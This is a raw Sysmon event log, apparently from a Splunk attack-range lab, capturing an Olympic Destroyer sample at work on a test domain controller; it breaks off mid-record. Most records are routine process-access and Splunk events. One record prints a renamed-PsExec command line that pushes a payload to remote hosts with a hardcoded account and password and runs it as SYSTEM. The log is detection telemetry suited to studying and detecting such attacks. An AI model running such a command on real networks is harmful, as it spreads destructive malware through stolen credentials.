10:56:49.230{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.214{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.199{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.199{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.199{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.130{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-9C05-000000003802}6776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.130{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-9C05-000000003802}6776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.114{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C5F1C3B6B6BABC6D580BB04715BF5236,SHA256=894A2A6DD1CDDC174D749EF1F83904E28F60BE76FD9A1BB3598D2F928690A97B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.114{C8EA50B7-12F1-6216-9C05-000000003802}67766328C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.083{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-9C05-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.083{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-9C05-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13493F08F3B39D6092DA76C03D4C28CA,SHA256=DA78173FB70E66B3ACA64BD66F0AC139DF50BB5742742B7EF19F2E3242CA64C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53C08E111403CC62DF4DC862F73214BD,SHA256=8096E48AB60BB58C9779F33DEBFDA9E8A55BDFFC0C3C9AC13D4C0CA0404D6695,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.944{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-B005-000000003802}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.944{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-B005-000000003802}6416C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.944{C8EA50B7-12F2-6216-B005-000000003802}64161004C:\Windows\system32\conhost.exe{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.928{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFBDB411BC25414A1C9AAC3A6E07C7EA,SHA256=718075214B68A4679B822ED190DC9BD8BE79F99C4CEAF9063DE1863C1608EA25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.928{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-B005-000000003802}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.913{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-B005-000000003802}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.812{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.812{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.812{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.812{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.797{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.797{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.804{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.797{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.797{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000291593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:50.781{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.744{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AE05-000000003802}6332C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.744{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AE05-000000003802}6332C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.728{C8EA50B7-12F2-6216-AE05-000000003802}63325776C:\Windows\system32\conhost.exe{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.713{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AE05-000000003802}6332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.697{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AE05-000000003802}6332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.628{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F1E616DBF1EBD13AA7B82BDF4E2D01,SHA256=0680A71D4BA173CE23A5EF4793545587B3314E9DEC99F60886ED096555903EC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.261{4F8D34B0-12F2-6216-8604-000000003902}580368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 